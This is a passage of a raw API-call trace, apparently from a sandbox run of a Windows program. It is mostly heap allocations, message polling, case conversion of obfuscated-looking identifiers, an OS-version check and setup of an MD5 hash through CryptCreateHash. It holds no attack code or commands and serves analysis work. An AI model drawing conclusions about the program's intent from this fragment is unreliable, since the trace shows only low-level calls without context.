hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0198.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa08 | out: hHeap=0x2af0000) returned 1 [0198.797] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0198.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0198.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa930 | out: hHeap=0x2af0000) returned 1 [0198.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0198.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0198.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa08 | out: hHeap=0x2af0000) returned 1 [0198.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0198.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0198.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0198.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0198.797] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0198.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0198.798] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0198.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0198.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0198.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0198.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0198.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0198.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0198.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0198.798] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0198.798] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0198.798] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0198.798] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0198.799] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0198.799] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0198.799] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0198.799] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.800] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0198.800] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f6f60, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0198.801] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0198.801] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f6ee0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0198.802] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa7c440) returned 1 [0198.835] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0198.838] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0198.838] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0198.838] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0198.838] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0198.838] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0198.838] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0198.838] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0198.838] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0198.838] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0198.838] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0198.838] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0198.839] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0198.839] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0198.839] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0198.839] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0198.839] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0198.839] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0198.839] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0198.839] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0198.839] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0198.839] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0198.839] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0198.839] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0198.839] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0198.839] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0198.839] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0198.839] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0198.839] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0198.839] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0198.839] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0198.839] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0198.839] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0198.839] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0198.840] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0198.840] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0198.840] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0198.840] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0198.840] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0198.840] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0198.840] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0198.840] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0198.840] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0198.840] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0198.840] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0198.840] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0198.840] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0198.840] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0198.840] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0198.840] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0198.840] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0198.840] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0198.840] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0198.840] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0198.840] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0198.840] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0198.841] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0198.841] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0198.841] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0198.841] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0198.841] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0198.841] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0198.841] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.841] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0198.841] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aaad98, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0198.841] CryptCreateHash (in: hProv=0xa7c440, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0198.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2a75160 [0198.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7220 [0198.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a08 [0198.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad80 [0198.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaacd8 [0198.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac78 [0198.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72aa8 [0198.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaadf8 [0198.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad20 [0198.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac30 [0198.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a38 [0198.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaade0 [0198.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac30 [0198.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac48 [0198.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0198.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad20 [0198.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac60 [0198.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac78 [0198.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72aa8 [0198.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab40 [0198.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaacd8 [0198.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae10 [0198.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a38 [0198.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac30 [0198.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac48 [0198.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab58 [0198.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0198.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2a75380 [0198.842] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0198.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0198.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0198.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0198.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70c0 [0198.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0198.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8d0 [0198.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab28 [0198.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0198.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0198.843] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0198.843] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0198.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0198.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0198.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0198.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab28 [0198.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0198.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0198.843] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0198.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a724f8 [0198.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaac8 [0198.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab28 [0198.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0198.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8d0 [0198.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0198.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fc0 [0198.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0198.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0198.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0198.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0198.843] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0198.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0198.843] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a72718, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0198.843] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0198.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x24) returned 0x2a697f0 [0198.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0198.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0198.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa870 [0198.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0198.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8e8 [0198.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0198.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa900 [0198.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0198.844] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0198.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0198.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0198.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0198.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f70c0 [0198.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x24) returned 0x2a69670 [0198.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0198.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0198.844] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0198.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a728f8 [0198.844] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a728f8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0198.844] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0198.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0198.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8d0 [0198.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab28 [0198.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0198.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0198.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0198.844] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0198.844] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 